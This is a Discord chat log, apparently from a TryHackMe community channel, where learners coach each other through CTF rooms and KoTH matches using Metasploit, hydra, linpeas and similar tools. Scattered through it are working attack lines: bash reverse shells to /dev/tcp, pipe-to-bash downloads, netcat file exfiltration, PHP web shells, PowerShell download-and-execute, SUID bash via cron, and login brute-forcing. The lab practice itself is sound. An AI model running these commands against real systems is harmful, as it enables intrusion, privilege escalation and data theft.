The session 4

Try to interact with it again , sessions -i 4

sessions to check again ?

Take a break that's all I can say now xD

msf is F'ed

uh

Should I start screaming now?

No no xDD

Just relax , take a breaak

Who needs help 👀

uh msf Is fucked

At least for me.

I'd love it if you were less vague

Sorry.

MSF Is closing my sessions all the time.

show me

He gets an active sessions but after some time it prompts a message that sessions died

^

He got like 4 times now and every time they died like after a minute or two

show me

set PAYLOAD windows/meterpreter/reverse_tcp

type options

@candid carbon type options

show options

Look at what isn't set

Yes RHOSTS

@mighty moon @austere viper ~/.wpscan/scan.yml

https://github.com/wpscanteam/wpscan#save-api-token-in-a-file

You typed "hosts" rather than "rhost" lmao

don't use -j

run

What are you trying to do

Try sessions

background

then sessions

meterpreter> is the prompt for you to enter commands

Type ls or dir

give it a moment to respond

cd .. x 5

Just type

cd .. 5 times

that won't work

dir

oiii

cd ..

cd ..

cd .. takes you one directory back

hold up do you guys now like hoe to hack proffesionaly

Hell nah

maybe

yeet

try

cd c:\users

bruh alright so anyone of you can take my discord ill let you do it see if your good lmao

@hollow steeple You can learn Cyber Security at https://tryhackme.com/

And remember when you read the rules, everything here is legal 😉

@quiet needle

like forreal

R.I.P

https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/

@candid carbon keep going until it responds

Yeah, we don't do that nor discuss that at all here @hollow steeple

ah shoot

STOP hahahah

type dir again

!rule 9

Rule 9: No discussion of illegal topics or actions.

This extends hackers for hire @hollow steeple

this is so sad

lmao im only 13 i dont have no money lmao

My brain went kabom

boom

booom

Tmrofter you need to keep changing directories until you can see the Users directory

earrape makes you think harder

Banned milkyway for discussion of illegal topics and a homophobic status

:/

We can use more creative vocabulary then that @candid carbon

Thank you Dark

That's pretty sad : (

Wooooo

did cd .. worked ? xD

YE

Now try dir

dir

I mean it doesn't seem to die

And you can change directories so

I don't know when I was helping him to get a shell like 4 times that shell died : (

But it seems it's stable now

I'm still smiling

Yeah man keep smiling 🙂

@ashen prism What now?

Just sudo msfdb run?

No your in a shell now you don't need to do taht

that *

oki

run ps to check list of processes running on that machine

Run it again

is help command working ?

@muted dirge open plugin editor, add system('bash -c "bash -i >& /dev/tcp/<ip>/9000 0>&1"'); in the code save, run that plugin if it is not running already

https://github.com/wetw0rk/malicious-wordpress-plugin

@candid carbon Ok now scroll up to see the basic commands you can run

Look for a command that can list all processes

Really it doesn't ?

Ok ps is a command then why is it taking it so long

Is dir still working ?

Me too xD

Now I want to scream xDDDD

/usr/share/webshells/php/php-reverse-shell.php

@candid carbon I'm gonna get going it's way much late for me sorry I can't help you with this : (

Yeah it seems

@ashen prism cya

What machine are you woking on? did you hear me?

jack

you could cat file | base64 | nc ip port

what r u guys doing in vc?

https://github.com/calebstewart/pwncat

wget http://<url>/file -O | bash

wget <URL file> -O - | bash

what r u guys doing in vc?
????

we are having fun

working on a box together

what box?

@summer pagoda for the 3rd time, it is jack

damn

htb?

or thm?

https://tryhackme.com/room/jack

https://tryhackme.com/why-subscribe this one?/

ping -n 3 ip always

@candid carbon using session 1, I think it's migrate -n spool ?

session -i 1 first @candid carbon

sessions*

oof.

you're telling me, I'm on anonymous playground rn and I'm on the last step

stuck with a (chmod 600) id_rsa file and nowhere to use it

@muted dirge https://github.com/DominicBreuker/pspy

https://www.youtube.com/watch?v=CISzI9klRkw

it's in /etc/debconf.conf

please don't just do that

there's a requirements.txt file

[pip_method] install -r requirements.txt

Is this for who?

jake, sorry

he was installing pwncat, a python script

scp /opt/linPEAS/linpeas.sh jan@10.10.210.75:/dev/shm

he's at the washroom rn

huh, wait there is a cron

will pwncat help with ^C'ing hung processes? 👀

guess he's still at the washroom

https://www.twitch.tv/alh4zr3d

lol

whihc box are u try'n? @dark igloo

hmm, alfred ^^

noice box

its good

yep, but kinda hard

like, i'm stuck here

where?

idk where i put the command ^^

did u get terminal?

try linpeas

this ?

set that linpeas in ur apcahe server

with curl ?

no just paste that file in www folder

and start service

www folder ?

wait go to kali

file system

var

html

\paster here

root permisions

how i get the root permissions ?

i can't sudo su

sudo bash?

no

in ur terminal

no bruh ur pc termial

xd

hmm

noice

cp

to that folder maybe?

start

jhyust service apache start

yes

2

apache2

then curl in that terminal

for the linpeas

curl the link

apache link

ur ip adress

ip_add/linepeas

wait

is it culr or wget?

we are sending linpeas to target file

wget <ip>:<port>/linpeas.sh
@dark igloo

the

wait i gues linpeas in apche2

once open ip in ur browers

/linpeas

wait

wt file did u paster there?

wget <ip>:<port>/linPEAS/linpeas.sh

yeah

yeah we did same

bro u did write u dint paste the corect shell file

u pasted the web server link

wget <your ip>:8000/linpeas.sh```
Make sure you are in the right directory @dark igloo

yeah

\just do gitclone

html

vuln

wait did u get the terminal ?

of that server?

user shell did u get it?

can u paste the screenshot of that step here

he's right, it starts in the directory you start it in by default

i guees

in ther server u have to find a area

oh wait you started an apache server

wher u can type this code

then yeah, you're gonna wanna put it in /var/www/html/

yes

yeah tryt that commnad

you have an http server running on 8000, you won't catch a shell if you upload that

netcat to that port

listen on that [port maybe

another port

you have an apache server running on port 80 too lol

in the coomnad also put the same port whihc ur using in netcat

you're close, think about what you've done

here, run this sudo service apache2 stop

i think it just saved

its like maybe that command is just saved u should like run it like ruuning the codes in server

see where all the clients are saved

go in build now

back go back

to home

no at first it showd a option like build now

goto projects

that project

1min before edited one

dont know bruh i am also stuck here

you guys have code exec 😭

Glass is back with another room wee

^^

noice

ig we pasted in wrong shell

what you working on Glass?

Alfred room ^^

uuu. Haven't done that one. Fun?

NO

Bye Juice

bye ^^

it's (port 80) used by your apache2 service.. 😅

Hey @plucky vault I finished rooting Jack this morning. It was quite easy after finding out that .py process

it's a weird one tbh, it's pretty CTF-y that we're just allowed to edit python3 libs

yw though

Exactly. I am not really sure how I would have done it if there were no write permissions. Something with PATH maybe? Pointing out to another place to look for libraries idk

sorry, wasn't paying attention

what payload did you use?

multi/handler requires specification, otherwise it defaults to a nc shell

kk, making sure

it's not lol

you used meterpreter in msfvenom

windows/meterpreter/reverse_tcp

yea, you did in msfvenom in your bottom windows

bottom right

-p option sets payload

you used windows/meterpreter/reverse_tcp which is a meterpreter payload

your multi/handler is using generic/reverse_tcp

set payload windows/meterpreter/reverse_tcp

it's a shell upgrade

yeah

meterpreter makes it easy to migrate into privledged executables like spoolsv.exe

you'll get it eventually, windows sec is dramatically diff from linux sec

the impersonate token allows you to impersonate the privledges of processes with a lower "integrity" value

oh try running shell

yeah

NT Authority's weird, I think it's kernel?

yeah sorry, you should learn a bit about the authorization scheme Linux uses

userland and stuff, yea

just read it as root

type

gg, grats

kk, it's fine

cya

oh man. i remmeber alfred

that was not fun at all

Xd

Yeah it was quite fun tbh

Juste ended it with a lot of help ^^

I will be here in ~1h to do another room ^^

Hi Juice

hi ^^

hye glass did u complete that box?

which one ?

alfred

sure ^^

noice

i'm doing another one now ^^

whihc one?

hackpark ^^

man its vip rooms

i dont have it

then subscribe ^^

no money

xd

lmfao

am i stupid or something

?

bro wt other website u use?

whihc are very informational

is vulnhub any good?

can we have a koth?

not now

some time later

ohk?

mee too

ohk we will try

just to get user

i will ping u when i am free

i also feel same somtime

dumb

k bye we can exams goddam

i dont know

why we have managemnet exam in cse

lol

cya

https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/ check this for hydra http-post-form @dark igloo

scroll down, you have an example

hydra knows what to do

leave it like that

no is not

use burp to intercept the login request

burp, my bad

foxyproxy

no

set the proxy: 127.0.0.1 port 8080

in foxy proxy

user options

don't bruteforce the password with burp

just intercept the request

is that the only page to login?

this is the correct page to brute force

are u sure this command is right ?

you don't need the ip

local file upload

oh yeah the scp command thing?

scp file otheruser@target:/otherfiles

oh yeah it's forensically safe

I think he mentioned pwncat having modules for autopwn

python *.py

could be python3

data:text/html,<marquee>this is my cool site</marquee>

What are you brute forcing @mental knoll

huh. @mental knoll have you added the cookie that's sent?

there's a cookie connect.sid

idk, just making a guess

@dark igloo ur using windowsExploitSuggester the wrong way

@dark igloo
on kali machine
./windows-exploit-suggester.py --update
on the target machine
systeminfo (save it to a file) then move that file to kali machine
and feed it to windows-exploit-suggester.py

try systeminfo instead

COPY PASTE 🙂

@dark igloo try download

@plucky vault any idea ?

oh sorry wasn't paying attention, what's happening?

loki seems like he knows what he's doing

priv esc

btw did your windows priv esc file come with a requirements.txt?

@mental knoll sorry I couldn't help it, it's a data uri for a discord ping

why is it so long ?

glass what did you run?

it looks like you're installing the entirety of the official python repo?

apt-get upgrade ^^

xd

oh

nah

@dark igloo it's just the color

I'll start on revenge* (box) ig

ig ?

oh ok

gl

ig means I guess

kk, cya

cya

they don't even give you a voucher...

200 eJPT and 400 for the rest

try editing php.404, I think uname's automatically called

<?php system() ?>

yeah it's right

?cmd=

maybe you could powershell -c "wget domain/meterpreter_payload" ?

@mental knoll https://github.com/besimorhino/powercat/blob/master/powercat.ps1

powershell IEX(IWR <url> -usebasicparsing)

cd C:\Windows\Temp

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md

@slow pond thank you bro i'll try learned

$PSVersionTable

What you working on?

@ruby kelp can you come to #talk-with-us-no-threading ?

oh oh I wanna come I wanna come

Hack the box???

come to #talk-with-us-no-threading

jkjk

its fine

😆

hahahahaha

❤️

how to verify?

!docs verify

@dark igloo is your name a reference to an edgy 4chan meme?

👀

LOOOOL

https://www.youtube.com/watch?v=rN2U5wkhRWc

@ruby kelp
por favor haz lo del caballo malo

can you hack ig?

can you hack ig?
@cedar phoenix i pro hacker. i hack everything.

👀

I'm what people call HackerMan

100% they stopped due to error

hello @slender kayak

whoever asked about Kali kernel: docker containers share the host kernel, so it's his own kernel you see

that is why the fork bombed crashed my entire system

@slender kayak you are from italy?

@cedar phoenix

😄

i'm planning to move to italy next year

👀

@lofty moat which city?

?

or just restart ur router 😄

to get a new ip

lmao

👍

👀

BED WARS

WITHOUT ME
😠

@manic canyon mc.hypixel.net

are you on hypixel rn

lets play bedwars i've never played before

whats your username

i can add u

`/f add

mines ownowl

genshin impact

its anime so

let me join vc

@lofty moat which city?
@slender kayak not sure yet. Planning to do my Masters in cyber security from there

If you have any info let me know please

And suggestions for the city/uni

@lofty moat I would suggest you to check which Uni provide the best Master for CyberSecurity

I think you'll probably end up in Rome or Milan, as they have the biggest unis and wider options

Bologna is the oldest in the world, but I'm not sure how the master is / if they have one.. When I went there one of the professors was a guy who knew personally Linus Torvalds, he was a sort of mythical being, we called him Kernel Bear Davoli at one point (probably we were drunk) and that's how we remember him in my uni group 😄

I think you'll probably end up in Rome or Milan, as they have the biggest unis and wider options
@main rover i did check some. But still a person who lives there could provide better options. For now completing my bachelors. Will be free during july. So looking for a uni that still have admissions open around that time. Or if some accepts for my seventh semester transcript maybe

Fair enough, Uni courses in Italy normally starts in September (late) as June to August is summer holidays and you can enrol during that time

I've been living in Bologna for 30 years of my life and went to uni there (dropped off after 4 years because I started working)

@lofty moat Milan is better. I have a lot of friends from Rome which are planning to move there for work

Fair enough, Uni courses in Italy normally starts in September (late) as June to August is summer holidays and you can enrol during that time
@main rover that is when classes start. But i have heard admissions start around april?

@lofty moat Milan is better. I have a lot of friends from Rome which are planning to move there for work
@slender kayak any uni there you would suggest for?

@main rover that is when classes start. But i have heard admissions start around april?
@lofty moat I never heard of it, also because until June / July high school students are still doing exams and they're not sure where to go.. I think I applied in August

🤔

Will check again and confirm that. If that's true then it would be awesome for me.

Ok Guys GTG byeee

ATB!1

hye ther!!!!!

hii

Bye

Try MrRobot room

me ?

Next time

already done, steel mountain rught ?

bye

^^

0day writeups are public now, if you were having trouble.

<?php system($_GET['cmd']);?>

&cmd=ls

Try other PHP ways to read files

<?php system($_GET['cmd']); ?>

&cmd=<your command>

which room

juice

@dark igloo your screen looks so overwhelming wtf

wwhats going on in vc?

#!/bin/bash

bash -i >& /dev/tcp/10.9.170.133/8089 0>&1

@muted dirge

😆

passthru > system

Watcha working on kali?

@mental knoll watching your stream on the bus

nice thanks dude

/bin/bash -c '/bin/bash -i >& /dev/tcp/IP/PORT 0>&1'

stty raw -echo; fg

Command: /bin/bash -c '/bin/bash -i >& /dev/tcp/$YOUR IP/$YOUR PORT 0>&1'
Note: To get a stable shell use the next commmands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
press CTRL+Z then type stty raw -echo and finally type fg
export TERM=xterm

echo $PATH

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

pentest.ws

http://ohpe.it/juicy-potato/CLSID/

@mental knoll cmd /c "juicy -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}"

are u subscribe ?

.

exit()

close proxy

tmux a

tmux ls

revershell I think?

try dmv, itsmeadmin doesn't exist on the machine

next time do ./linpeas | tee linpea.txt

it will also show output of linpeas and store it in text file

someone already sent you a shell btw

wasn't me, just noticed it

export color_prompt=yes I think?

standard suid

^

it does CTRL+F lol

which room is this?

it's the youtube downloader one

u cannot really do sudo -l from www-data

cause it has no password probably.

and the sudo -l should return, (All, !root) <some command>

which room is this?
@tawdry cypress convert my vid

iirc the vuln against sudo 1.8.21p2 doesn't allow for priv esc. to root?

yeah it does

if we have a sudoers entry like that described in the website

like (All, !root) <some command>

that is the prerequisite

it's vulnerable if u meet the prerequisite.

from www-data i really believe u can't meet the requirement.

It's still worth trying sudo -l on www-data -- especially if the box is more CTF-y

You'd never see it in the real world, but some of the... less realistic boxes do it quite frequently

@tawdry cypress it is fixed on 1.8.21p2 tho https://launchpad.net/ubuntu/+source/sudo/1.8.21p2-3ubuntu1.1

no no p2 has that as well

is it not p2?

thanks @supple trellis ! didn't know. thought anything less than 1.8.24 has that

it says if u have a param called c

then it will run that command

like url/?c=id

will run id command

@mental knoll what the heck u doing now

wait why i am i writing here. they are not even checking vc chat

lol

tbf you guys never really touched on the dmv user

^ yes. if there is a user there will probably be a horizontal privesc somewhere

find / -user dmv 2>/dev/null or something, but there's no suids

you can make bash suid binary

and get root

depends, is path vuln?

there is cron running

so running chmod +s /bin/bash in cron should do the work

no need to listen for reverse shell

oh yeah, no you're right that'd work

hahah

@plucky vault who put chmod +s /bin/bash

🤣

@plucky vault

Why is Microsoft this brain dead to allow NBNS spoofing?

Oi, take that off my comment now!

I understand nothing you're reading,yikes.

Mate...

Oh thanks.

wut

focus!!

lol

Yeah, I need to focus. XD

Time for that relaxing playlist again

LMAOAOAO

oh no no no

LMAOOAOA

So relaxing.

thats what im saying...

@worthy ermine everything good?

Arose out from the azure main!

https://www.youtube.com/watch?v=v2c5QHtgFxY

Is this Same Relevant 1 from Vulnhub ?

...

..

.

Not sure.

I don't do Vulnhub.

hmm

There's a tutorial room

https://blog.tryhackme.com/free_path/

This is also a decent blog.

Decompiles binaries...wut??

What do you mean?

Nuc mentioned it

idk

changes binary to a language

@tight swan instead of compiling source code into machine code
ghidra takes binaries in machine code and attempt to decompile them into source code so you can figure out how the binary works and do reverse engi CTF challenges that don't require a dynamic binary analysis tool like gdb

Ahh

Ahhhhhhh.

brrrrrrrr

i go zzzzzzz now

Ok. See you later.

Probs tomorrow.

You better stream tmmr!

https://www.youtube.com/watch?v=IMpB9mNmPuQ

@tawdry cypress on dogcat you need to run sudo -l on www-data to move forward. I was confused myself of it but it seems it can happen

yeah as muir said, ctfy boxes have that.

hello

how i can hack a mac book air??

https://github.com/XiphosResearch/exploits/tree/master/Joomblah

probably but with the salt you're likely to only hit writeups

'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'

at a rate of 50 hash per second it'll take you 15 mins to crack it

how i can hack a mac book air??
@compact sand Would it be a MacBook Air that you own? 🤔

.

you only need sudo privs for ports under 1024

@dark igloo ;

yes

@full sapphire yes the macboob is mine

book

Bye 👋

👋

bye ^^

https://tryhackme.com/room/zthlinux

https://tryhackme.com/room/rpnmap

g

g

g

@minor sky wdym?

@mental knoll c:\windows\temp or %temp%

cd c:\windows\temp; dir @mental knoll

that is not a persistent shell

try dir c:\windows\temp then

cd $env:temp

@plucky vault youre correct mate! 👍

@plucky vault 😏

Oi, MP3!

Why are you not in the chat!!!!

?

Loading up pc, joining rn

what u working on?

what room

Wo de mingzi.

https://www.youtube.com/watch?v=Zs772vyZr9Y

delete that shit

NO!

NO!

memories of my childhood

not again LOOL

NIHAO!!!

smol monkey

....

..

.

NIHAO!!!!!!!!!!!!!!!!!!

you always get distracted by the dumbest things LMAO

delete that shit
@plucky vault language please and thanks.

lol my bad

@compact sand we cant hear u

ahhh

sorry just got a video running.and didnt see that i,m still in the chanel

@plucky vault is this of use?

https://adsecurity.org/?p=2398

https://www.google.com/search?q=Install+from+Media+(IFM)+set+from+ntdsutil&rlz=1C1CHBF_enUS918US918&oq=Install+from+Media+(IFM)+set+from+ntdsutil&aqs=chrome..69i57&sourceid=chrome&ie=UTF-8

😦

;0

The service crashed that's why. -.-

(web)

wait 3-5 min .

Gobuster sometimes won't work properly

Which room FancyBear

??

Kerberos.

it's protocal

maybe you use it in AD

https://en.wikipedia.org/wiki/Kerberos_(protocol)

maybe you use it in AD
@last quail '

You're not wrong.

😉

Active directory

:))

Disactive InDirectory.

ok can you begin?

wow

-_-

report?

report?
@torpid elk 👍

hey ^^

what append ?

i am record you stream:)
@torpid elk good job bro

i just understood "scam"

ye season 1 is good ^^

what are we waiting for ?

https://www.youtube.com/watch?v=xK3yuxrmCac

https://www.youtube.com/watch?v=MAlSjtxy5ak
https://www.youtube.com/watch?v=Rp9e1Y-vdBM
https://www.youtube.com/watch?v=_WH6cbwZ5m8

wpscan –url http://example.com –enumerate u

https://www.hackingarticles.in/wordpress-reverse-shell/

hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P rockyou.txt

For a 0x2 hacker, I’m so confused.

^^

LOL

What's "LOL"?

.....

Behave yourself.

mispelled that with what

now that we know....

now we know

no

no, now we know that it was now that we know

its
now that we know what active directory is we can blah blah blah

sudo apt install cowsay

lol

🤣

LOL

nice vc

i like it

so productive

yeah

learning a lot

🤣

ah man

lol

that is a twist

it does

🤣🤣

NIHAO!!!!

NI HAO KAI LAN WAS MY SHIT

I love it!

he listens to the anthum everyday!

🕵️

lol

😁

where did the other guy went?

mksquashfs /some/dir dir.sqsh

@crude void

bear

@plucky vault which os r u using as primary os

Ubuntu 20.04.

ohki

@lofty moat, how are you?

I'm fine, what about you?

Yeah, I feel great.

(Don't mind me i just like to watch, i don't talk)

We all know that.

This is so cool and interesting.

what is?? 🤔

This AWS stuff.

Stuff I'm working on now.

Good luck

imma play a quick koth match before i go to bed

its 07:50am

Did you sleep through the night?

No

about to

Lol, wow.

@plucky vault what box is this ?

advent of cyber, task 19.

I'll be back.

I just don't want to leak my stuff.

what did you do so far ? I'm still new to this so i'd like to learn a bit more

ok cool thanks

I'm trying to list files in a S3 Amazon bucket.

Basically its cloud storage for ifles.

files

.

you're reading the syntax for aws ?

or did you have prior knowledge of aws

No, I don't.

Oh, a little bit actually.

At work.

We have a Filemaker server at work.

https://en.wikipedia.org/wiki/FileMaker

And it runs on Amazon AWS.

oh wow cool, ok so i still have much to learn

Me too.

-.-

I don't know how I'm suppose to download the file.

It says that I need to sign up or something.

Surely I don't need to pay Amazon in order to complete this task.

no no

did you try to scan the address to see if you can somehow just straight up download it ?

No, I need to use aws-cli

hmm

According to the Google Sheet material.

what's the name of the file ?

I'm not paying anything to complete htis room.

I don't know yet.

I need to get my aws-cli working before I can find out.

i think this is key

Analysing requests on web pages
Some pages retrieve static resources from s3 buckets

What room is it?

I can’t think of any room that requires knowledge of s3 buckets and aws-cli

Oh aoc

you can just curl the bucket I mean you can set up aws-cli and interact with it but that’s a lot more annoying

How do I curl the bucket?

How do I see what is inside the file?

I got the filename but not the contents.

how much knowledge required to play koth ?

@simple roost, not much.

For the easy machines at least.

like ?

production.

@rough flax, thanks that curling hint helped. I just curled the file.

Hi

it's worth going ahead if it's gonna pay out @plucky vault

lol true, keep it discreet, but clear

@plucky vault it's someone close-to-me who painted it

Hey @earnest prism

hey broh

is your mic not working ?

can't use right now!

ok ok

coz it's stable, even I use it! @plucky vault

it doesn't break on silly kernel updates

you wanna see how it looks for me? @plucky vault

Have a good one! bbye @plucky vault

@delicate crane you gotta restart the machine if you fail once

I guess the exploit has the word, "pulsor" in it, right? @plucky vault

https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit @plucky vault

This is in msf dude

it's surely gonna work!

lol

I didn't say to clone it, I sent it in reference to this

I guess the exploit has the word, "pulsor" in it, right? @plucky vault
@heady dew

omg internal was so hard i just dreamt about it

Hello there Advent of Cyber is for subscribers only or it's free

It is for free (;

Woups missclick sorry :)

Hey guys, first time here..hopefully i learn something 🙂

3 operations
aaa
afl (or af)
vv

navigate w/ arrow keys tab

https://radareorg.github.io/blog/posts/awesome-ascii-graphs/

radare2 is a gift from the gods

my BT just puked out

sorry

btw q to get out

i think

You have multiple levels of analysis

aa, aaa, aaaa

each one is more intensive

Yes

learning radare2 from learning paths

Uhh. hacktivities. sec

https://tryhackme.com/room/introtox8664

I know, it says intro to

its really an intro to r2 🙂

https://radare.gitbooks.io/radare2book/content/debugger/revdebug.html

The debug book?

its good if you KNOW what you are looking for

if you dont know, its a long read

Yupyup. i just wante dot get you before my BT totally crapped out. its charging now

ciao

Good afternoon
[10:32 AM]
0x9 lvl I'm not sure if your trolling
[10:32 AM]
oh its krypto
[10:32 AM]
make sure you are doing the download ON your attack machine
[10:33 AM]
headphone charging right now. gimme bout 3 more mins

Message #koth-voice-chat

Bot is called tryhackme

~/.bashrc

cat >> ~/.bashrc
alias ovpn='sudo openvpn ~/Downloads/kryptonn.ovpn'

CTL D (it means ^D)

cat >> ~/.bashrc  << 'EOF'
alias ovpn='sudo openvpn ~/Downloads/kryptonn.ovpn'
EOF```

cat >> ~/.bashrc << EOF

source ~/.bashrc

sudo openvpn Documents/Naughty.ovpn
i don't like saving my 3 seconds.. i will put the whole command to run my vpn.

@royal gust i heared 6 oclock

@royal gust https://github.com/bannsec/stegoVeritas

https://drive.google.com/file/d/13Tdl5SX-feSozr-1fgqZmuww_qaEMLCw/view?usp=sharing

@royal gust https://github.com/bannsec/stegoVeritas#option-1----pip

@royal gust with sudo

@crude void https://tldp.org/HOWTO/SquashFS-HOWTO/mksqoverview.html

-be for big endian

-le for little endian

https://www.centennialsoftwaresolutions.com/post/stop-typing-make-arch-arm-cross_compile-arm-linux-gnueabi-o-when-building-the-linux-kernel

wow

sad story

-be for big endian
@supple trellis tthankss

@remote ledge what's a sad story

https://jeanvitor.com/image-entropy-value-visualization/

What is the ei??f

eiff?

TIFF

zsteg

stegsolve.jar

@royal gust https://tryhackme.com/room/ninjaskills

https://tryhackme.com/room/cornconctf

@royal gust https://github.com/LandGrey/CVE-2019-7609/ maybe this works

CVE-2018–17246

http://<remote-ip>:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../root.txt

Reference Error

10.10.65.82

👀

🙄

http://10.10.65.82:8000/kibana-log.txt

python3 -c "'A' *100"| ./access-check

Hi, anyone played pwnadventure3 ?

no

https://tryhackme.com/room/cornconctf
wonder how my room end up there

Hmmm

Pizza dough, check.

pizza sauce, check

need to give the dough 30 mins to rest. and i will begin preheat

being the lazy person .. its juts a plain old pepperonni pizza...

this ones a thick crust though

i am having a online lesson now lmao

calls the cops 👀

@plucky vault https://www.duolingo.com/

https://tryhackme.com/why-subscribe/

@paper steppe

@plucky vault what are u trying to bruteforce?

website.

means like with any username?

or u r giving a uname?

Sorry what?

like what usernames are u trying/

means if i try to do it with my username will it do it (if my pass is in it)

Molly, molly, Elf Molly, elf molly.

As according to the THM page.

o

I'm so confused why I'm not getting the right password.

bro im beginer and have to do a lot

hey can u tell me some good ctf sites for beginers? pls

overthewire , underthewire , PicoCTF

are they like for beginers?

Yes they are for beginners

ok th

any chalanges like root that and get flag types?

@ashen prism

overthewire and underwire are not like those flag types CTF's they are like wargames where you have to just find the password however PicoCTF is like flag type

no i mean like we have to root the macihne and get the flag

No I don't think they are like those kind of challenges they are just for learning the tools and the basic level stuff for rooting the machine type of challenges TryHackMe and vulnhub is the best so far .There is HackTheBox too but that's for intermediate level so if you have already started with TryHackMe then stick with it

vulnhub i will have to root the machine right??

Yeeah

and any site for like a machine has a webserver and we hv to get in it and get flags from ssh

sry for troubling...but im real beginer so asking u abt it

Yes for that there is TryHackMe of course , vulnhub and HackTheBox

Oh no worries man I am not that kind of a elite my self xD

cause other guys just start shouting

hydra -l molly -P ./password.txt thm http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:Your username or password is incorrect." -V -I

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

@plucky vault do a post request

Don't give me the answer.

don't do a post request 🤷‍♂️

All I'm asking is to not give me the answer.

What?

@muted dirge https://resources.whitesourcesoftware.com/blog-whitesource/new-vulnerability-in-sudo-cve-2019-14287

cause other guys just start shouting
@formal garnet I'm happy to help man feel free to DM me whenever you want

man im not able to do the thm lion koth

Lion , I haven't done it but I'll try to do ,the boxes that I have done in KoTH are shrek , offline , that kung fu panda one and space jam

ur subscribed??

Yes

https://tryhackme.com/games/koth/join/48412158cfd5c258843588f8

Dark in vc

Oof not anymore

https://tryhackme.com/games/koth/join/31ffeaf71c895ac7b065d2b4

https://tryhackme.com/games/koth/join/bbe28cb69161b5eaf47cb706

Hail Hydra

the end of the function is before popq instruction

https://github.com/JohnHammond/poor-mans-pentest

yeah

Ah!

what cant you do? @royal gust

magic mushrooms

@royal gust :
if he wants it
he studies it
and gets it done

me:
i want it
i study it
i cry

@worldly minnow : look up a song called uhh .. eraser

You practically wrote the lyrics just now 😉

puzzels

🤮

what is this ?

idk

solving some puzzels

I think they were getting curb stomped by the puzzles 😉

https://research.checkpoint.com/2017/eternalblue-everything-know/

thx

echo %USERNAME%

Türk var mı

https://tryhackme.com/games/koth/join/f50f2271d79326214daf10fb

@mental knoll kazam (1) - Screen recording and capturing program.

sporked@livid nymph:~/thm$ apropos screen | grep -i record

ps auxfr

ps auxf

root 1 0.0 0.0 169248 11652 ? Ss Oct22 0:48 /sbin/init splash

sporked@kali:/etc/init.d$ cat ntp
#!/bin/sh

BEGIN INIT INFO

Provides: ntp

Required-Start: $network $remote_fs $syslog

Required-Stop: $network $remote_fs $syslog

Default-Start: 2 3 4 5

Default-Stop:

Short-Description: Start NTP daemon

END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

. /lib/lsb/init-functions

@royal gust why doesn't WSL run init?

I was asking if he was runing WSL